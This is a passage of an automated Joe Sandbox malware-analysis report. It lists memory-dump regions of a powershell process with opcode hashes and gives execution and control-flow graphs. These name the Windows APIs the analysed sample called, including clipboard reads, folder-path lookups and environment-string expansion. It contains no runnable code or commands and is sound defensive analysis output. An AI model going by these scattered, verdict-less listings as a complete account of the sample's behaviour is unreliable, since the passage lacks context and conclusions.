                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 36208bdd30ae8da0c335fb4cc99675939fcc84e1b34c83046efc3210341fc976
                                                                                        • Instruction ID: 9492d87a249f8cbac033bebfc91a5afd8d5f6d6020807bc374f0663590ddd4ab
                                                                                        • Opcode Fuzzy Hash: 36208bdd30ae8da0c335fb4cc99675939fcc84e1b34c83046efc3210341fc976
                                                                                        • Instruction Fuzzy Hash: D84106B5E05318CFEB68CF6AD8447A9BBF2AB89304F14C0AAD50CA7255DB700985CF41
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2981246123.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6a40000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 17776e466cbb3653f42b7de92fcfcb42b429242a4a293cb1a52e85a960f743d7
                                                                                        • Instruction ID: 55861766648c4c506befcd2cf21469f2731d27b617d35d4535d7ed92dba03ade
                                                                                        • Opcode Fuzzy Hash: 17776e466cbb3653f42b7de92fcfcb42b429242a4a293cb1a52e85a960f743d7
                                                                                        • Instruction Fuzzy Hash: 3841A575E062288FEB68DF6AC9446D9B7F6AFC9300F14C0A9D40DAB254DB349A85CF50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2981421552.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6a70000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ec699acb55103f2ab56cf259538834593fae889fef2393e1d4a8926a58f720a3
                                                                                        • Instruction ID: 1a0f62c68947e5cbb7b640e42e9591a28fe0fa7923201368df44faf362c577b0
                                                                                        • Opcode Fuzzy Hash: ec699acb55103f2ab56cf259538834593fae889fef2393e1d4a8926a58f720a3
                                                                                        • Instruction Fuzzy Hash: 5721AA71E046689BEB58DF6BCC446DEFAF7BFC9301F04C1BA9408AA258DB745946CE40
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2981421552.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6a70000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c55fcf16694838e11b1f373e384943e8c765d1421d258705e514654b4cc97808
                                                                                        • Instruction ID: 350d51d22ab5fabdc86eafa6e78b778889fde6d34e48b47e8eddc940328dacbb
                                                                                        • Opcode Fuzzy Hash: c55fcf16694838e11b1f373e384943e8c765d1421d258705e514654b4cc97808
                                                                                        • Instruction Fuzzy Hash: A811EC71D056589BEB18DF67CC407AAFBF7AFC9200F04C1BAD418AA255EB741A458F90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2981421552.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6a70000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d360fce5368ff45e54344a1c5ff25690d1b62ce830a00624eef1a20d9c73de78
                                                                                        • Instruction ID: a315160a9c0af42498de65c37bed16b0eb3825f412c0a8064dbcad6fee094e05
                                                                                        • Opcode Fuzzy Hash: d360fce5368ff45e54344a1c5ff25690d1b62ce830a00624eef1a20d9c73de78
                                                                                        • Instruction Fuzzy Hash: 9711BC71D046198BEB58EF67CC003AEF6F7BFC9200F14C46A851DA6255DB741A458F90

                                                                                        Execution Graph

                                                                                        Execution Coverage:2%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:18.4%
                                                                                        Total number of Nodes:38
                                                                                        Total number of Limit Nodes:3
                                                                                        execution_graph 13869 440114 13871 44011e 13869->13871 13872 44013f 13869->13872 13870 440692 13871->13872 13875 43ff90 LdrInitializeThunk 13871->13875 13872->13870 13876 43ff90 LdrInitializeThunk 13872->13876 13875->13872 13876->13870 13877 4087d0 13879 4087df 13877->13879 13878 408b05 ExitProcess 13879->13878 13880 4087f4 GetCurrentProcessId GetCurrentThreadId 13879->13880 13885 408ae9 13879->13885 13881 408819 13880->13881 13882 40881d SHGetSpecialFolderPathW GetForegroundWindow 13880->13882 13881->13882 13883 4088ef 13882->13883 13883->13885 13886 40cd10 CoInitializeEx 13883->13886 13885->13878 13859 439f61 13860 439f66 13859->13860 13861 439f83 GetUserDefaultUILanguage 13860->13861 13862 439fae 13861->13862 13887 4405d6 13888 44060e 13887->13888 13889 4405f4 13887->13889 13889->13888 13891 43ff90 LdrInitializeThunk 13889->13891 13891->13888 13863 440187 GetForegroundWindow GetForegroundWindow 13892 442ff0 13893 443009 13892->13893 13897 44302f 13892->13897 13893->13897 13898 43ff90 LdrInitializeThunk 13893->13898 13895 443058 13895->13897 13899 43ff90 LdrInitializeThunk 13895->13899 13898->13895 13899->13897 13900 442cb0 13902 442cd0 13900->13902 13901 442dbe 13902->13901 13904 43ff90 LdrInitializeThunk 13902->13904 13904->13901 13905 4403b0 13906 4403f0 13905->13906 13906->13906 13907 44057e 13906->13907 13909 43ff90 LdrInitializeThunk 13906->13909 13909->13907

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetCurrentProcessId.KERNEL32 ref: 004087F4
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 004087FD
                                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004088B8
                                                                                        • GetForegroundWindow.USER32 ref: 004088E1
                                                                                        • ExitProcess.KERNEL32 ref: 00408B07
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2974564346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                        • String ID:
                                                                                        • API String ID: 4063528623-0
                                                                                        • Opcode ID: b53ddad33463d6588bbaac082229ca88fbdd86cfefafa43d8ee24cb355131160
                                                                                        • Instruction ID: db35958a3bfc774e3574cbb327f4a8ddbbb8afa6735c79b764e864f412281d9a
                                                                                        • Opcode Fuzzy Hash: b53ddad33463d6588bbaac082229ca88fbdd86cfefafa43d8ee24cb355131160
                                                                                        • Instruction Fuzzy Hash: 31817873F447040BC718AEA98C5239AB6D69BC5314F0F813EA894EB7D1EDBC9C058789

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 74 43ff90-43ffc2 LdrInitializeThunk
                                                                                        APIs
                                                                                        • LdrInitializeThunk.NTDLL(00442DF0,?,00000018,?,?,00000018,?,?,?), ref: 0043FFBE
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2974564346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                        • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                        • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                        • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 55 439f61-439fac call 414380 * 2 call 441820 GetUserDefaultUILanguage 62 439fae-439fb1 55->62 63 439fb3-439fd8 62->63 64 439fda-43a005 62->64 63->62
                                                                                        APIs
                                                                                        • GetUserDefaultUILanguage.KERNELBASE ref: 00439F8B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2974564346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: DefaultLanguageUser
                                                                                        • String ID: JTQV
                                                                                        • API String ID: 95929093-2683337213
                                                                                        • Opcode ID: 74514a546d080ff90dba6c27650476f674d12b31669f80f490a3163fa2ae99e9
                                                                                        • Instruction ID: a5a30e69b8567420c20fd5ebbde5cd8a50f59b3655f6296b26b67574ef60dd26
                                                                                        • Opcode Fuzzy Hash: 74514a546d080ff90dba6c27650476f674d12b31669f80f490a3163fa2ae99e9
                                                                                        • Instruction Fuzzy Hash: 38114870E091958BDB04DB38C9407AEBBF15F8A300F08409DCC85A3381C9B88D40CB96

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 65 440187-4401a8 GetForegroundWindow * 2
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32 ref: 00440187
                                                                                        • GetForegroundWindow.USER32 ref: 00440190
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2974564346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: ForegroundWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2020703349-0
                                                                                        • Opcode ID: 2d67d6fccd817e7cbdf86aa863c46ff58df4e2e021629c1b1d4b1f47a174ae26
                                                                                        • Instruction ID: 1bf9a13d28fe14cb0f728dc8648395d6875f67f2a281736c30704eaacacf2c38
                                                                                        • Opcode Fuzzy Hash: 2d67d6fccd817e7cbdf86aa863c46ff58df4e2e021629c1b1d4b1f47a174ae26
                                                                                        • Instruction Fuzzy Hash: 16C04CBC964501DF8304CF34EC5957AB731F70B2067012974E947D33A0CB20D4058E5D
                                                                                        APIs
                                                                                        • RtlExpandEnvironmentStrings.NTDLL ref: 004118E4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2974564346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnvironmentExpandStrings
                                                                                        • String ID: 4$U$Z$[$_$e$i$l$r
                                                                                        • API String ID: 237503144-1010730913
                                                                                        • Opcode ID: dab31c1eb7ac62283899e043bdaaf28c4970f8b2496b773213e28282382eae7e
                                                                                        • Instruction ID: f158e5bef2ba578ec80f81f4270db95797e120e8d212b0ad3e56db1269e71a4d
                                                                                        • Opcode Fuzzy Hash: dab31c1eb7ac62283899e043bdaaf28c4970f8b2496b773213e28282382eae7e
                                                                                        • Instruction Fuzzy Hash: 4712B571A0D7908BC3249F38C4913EFBBE1AF95324F148A2EE9D9973D1D63889458B47
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2974564346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: Clipboard$CloseDataOpen
                                                                                        • String ID:
                                                                                        • API String ID: 2058664381-0
                                                                                        • Opcode ID: f5035826ee4d316abcdc0e6ec10f99a99522f1a8830ca359e048234f3d314477
                                                                                        • Instruction ID: 23509445a6444d18708855fe6f937cee4dc07ae03a5a1f75b6f15f7b5c304367
                                                                                        • Opcode Fuzzy Hash: f5035826ee4d316abcdc0e6ec10f99a99522f1a8830ca359e048234f3d314477
                                                                                        • Instruction Fuzzy Hash: FA5104B1908A519FD710AB7888453AEBFB0AB06314F09863ED8D59B3C2D33D9918C797
                                                                                        APIs
                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 0042B7C0
                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,?,?), ref: 0042B868
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2974564346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnvironmentExpandStrings
                                                                                        • String ID: B"@$;vt$`J/H
                                                                                        • API String ID: 237503144-170399521
                                                                                        • Opcode ID: 7be3fe531ec2a571431b2006e3bae6e92cd334459146956923909a23ea2a7d18
                                                                                        • Instruction ID: 7c2d8bd6dc7b18dadeb97f74cb8787293b007827ac7d21ffeb7daac3b3c1ba27
                                                                                        • Opcode Fuzzy Hash: 7be3fe531ec2a571431b2006e3bae6e92cd334459146956923909a23ea2a7d18
                                                                                        • Instruction Fuzzy Hash: 2E41F2B13083409FD310DF65E89176BB7A9EBC6704F59583DF6858B2A0DB74C805CB96
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2974564346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: MetricsSystem
                                                                                        • String ID:
                                                                                        • API String ID: 4116985748-3916222277
                                                                                        • Opcode ID: 21ac3e22552be4594692a983c8201de6ea223e01b155c7f035664b46463b8fc8
                                                                                        • Instruction ID: 8dccc7819729c5472eaa6d6a03895a6b721154fd4d1d0403bf1651bddd237505
                                                                                        • Opcode Fuzzy Hash: 21ac3e22552be4594692a983c8201de6ea223e01b155c7f035664b46463b8fc8
                                                                                        • Instruction Fuzzy Hash: E25171B4E142088FDB40EFACD985A9EBBF0BB49310F118569E498E7350D734AD45CF96
                                                                                        APIs
                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 0042A657
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2974564346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnvironmentExpandStrings
                                                                                        • String ID: ,.$}{
                                                                                        • API String ID: 237503144-3262223846
                                                                                        • Opcode ID: bdac7e51fc3919f9c53e502fe08982eb573b6a5dd39e5e84018bef184397148f
                                                                                        • Instruction ID: 740c5f166c75b02316c7727a25b89420c9ec09fdf3eedcec54cfef5fa18f7566
                                                                                        • Opcode Fuzzy Hash: bdac7e51fc3919f9c53e502fe08982eb573b6a5dd39e5e84018bef184397148f
                                                                                        • Instruction Fuzzy Hash: F121C33138C3515FD314CE64E801B6FB7A6EBC2700F15C83DA1D59B285C67988068B57
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2974564346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d2369f0a2b37e35cc6da78eca50ebd03e30e12cf705b5a3d681591d29a2ea519
                                                                                        • Instruction ID: 12e11e4fcceee7c80bd4bffaf98342dab6a6aef38cbea1358310c07625e72162
                                                                                        • Opcode Fuzzy Hash: d2369f0a2b37e35cc6da78eca50ebd03e30e12cf705b5a3d681591d29a2ea519
                                                                                        • Instruction Fuzzy Hash: 69C10631109BD08ED3528B79C450762BFE1AF16208F2CC99ED5E9CB793C22AE647DB15
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2974564346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeString
                                                                                        • String ID: $"$$$&$($*$,$.$0$0$2$4$6$8$:$<$>$P$R$T$V$\
                                                                                        • API String ID: 3341692771-1974145923
                                                                                        • Opcode ID: 9543dde067fd222c729af44c7cff5e925f0c4f14d8b1430ad7a06fdf9366d08e
                                                                                        • Instruction ID: d17282a6ba8d2e042515af0b9b930729184cb2f8de6815083c29b2f9c9581e41
                                                                                        • Opcode Fuzzy Hash: 9543dde067fd222c729af44c7cff5e925f0c4f14d8b1430ad7a06fdf9366d08e
                                                                                        • Instruction Fuzzy Hash: 7961B3600087C2CADB66CF3C88C82467F945B27224F5987C9D9E44F3DBC2A5C54AC7A6
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2974564346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeString
                                                                                        • String ID: $"$$$&$($*$,$.$0$0$2$4$6$8$:$<$>$P$R$T$V$\
                                                                                        • API String ID: 3341692771-1974145923
                                                                                        • Opcode ID: c59e0541eb241186dbd1fc6042e594c7257a22d99d112969f23f5a9ded20a538
                                                                                        • Instruction ID: 1030ef95e7ab0e5d25b914b8c03a64016e7ae34eef9687cfa4013e7dadcfbcec
                                                                                        • Opcode Fuzzy Hash: c59e0541eb241186dbd1fc6042e594c7257a22d99d112969f23f5a9ded20a538
                                                                                        • Instruction Fuzzy Hash: 4761A6601087C1CEDB66CF3C88D82467F905B27224F5987C9D9E44F3DBC2A5D54AC7A6
                                                                                        APIs
                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,00000000,?,?), ref: 004150A5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2974564346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnvironmentExpandStrings
                                                                                        • String ID: 5$XQA
                                                                                        • API String ID: 237503144-1080531609
                                                                                        • Opcode ID: 6ac99596efdb9aaf3d7460114b16674756ded0ede69c48d2a6f985543f655faf
                                                                                        • Instruction ID: ef1d5ee433fba6d2bd8de6273471e5f3f8ba7303a78429af7f3e4539347e5f1d
                                                                                        • Opcode Fuzzy Hash: 6ac99596efdb9aaf3d7460114b16674756ded0ede69c48d2a6f985543f655faf
                                                                                        • Instruction Fuzzy Hash: 4B2123B6808750CFC362CB28CC507EB7BD8AB9A354F144A6DE4CAC7291EB388604C756
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2974564346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: MetricsSystem
                                                                                        • String ID:
                                                                                        • API String ID: 4116985748-3916222277
                                                                                        • Opcode ID: eb91bafb1beaf0e186fe8fa00ad0d20060cc00bd54785ce129931c4668b26c0d
                                                                                        • Instruction ID: 1b31253ffa96547c8305db98b3e24547f185a52af27ccf84562e97f797381ab0
                                                                                        • Opcode Fuzzy Hash: eb91bafb1beaf0e186fe8fa00ad0d20060cc00bd54785ce129931c4668b26c0d
                                                                                        • Instruction Fuzzy Hash: BE31A2B4914304CFDB00EF68D98565EBBF4BB89304F11852EE898DB360D374A948CF92
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2974564346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeLibrary
                                                                                        • String ID: #v
                                                                                        • API String ID: 3664257935-554117064
                                                                                        • Opcode ID: eb0729ca2ad5db2b7c4b8484c080e350ab7c49d7756b8b2827baf71382720c12
                                                                                        • Instruction ID: 7fe645e5a1806ba3db490554f68d865c6461c74cea483efd98481efb97b94095
                                                                                        • Opcode Fuzzy Hash: eb0729ca2ad5db2b7c4b8484c080e350ab7c49d7756b8b2827baf71382720c12
                                                                                        • Instruction Fuzzy Hash: C0D0C9385492429FC7669B20ED4E6557BA5EB8A206F04683AE54AC1330C7304420CE09
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2974564346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeLibrary
                                                                                        • String ID: #v
                                                                                        • API String ID: 3664257935-554117064
                                                                                        • Opcode ID: d57c2fd4d2fe1887fe38ff71a526c5d3361c08f275f89b8d8417c9ac335b6b61
                                                                                        • Instruction ID: b540480d323da8bda0de83a7b16fdf099f46aa9f3ff081627c3fcafe6adbea87
                                                                                        • Opcode Fuzzy Hash: d57c2fd4d2fe1887fe38ff71a526c5d3361c08f275f89b8d8417c9ac335b6b61
                                                                                        • Instruction Fuzzy Hash: 71C00279403101ABDF826BA4FD8A9183F62FB56305329D274A40240635DB260924AE9D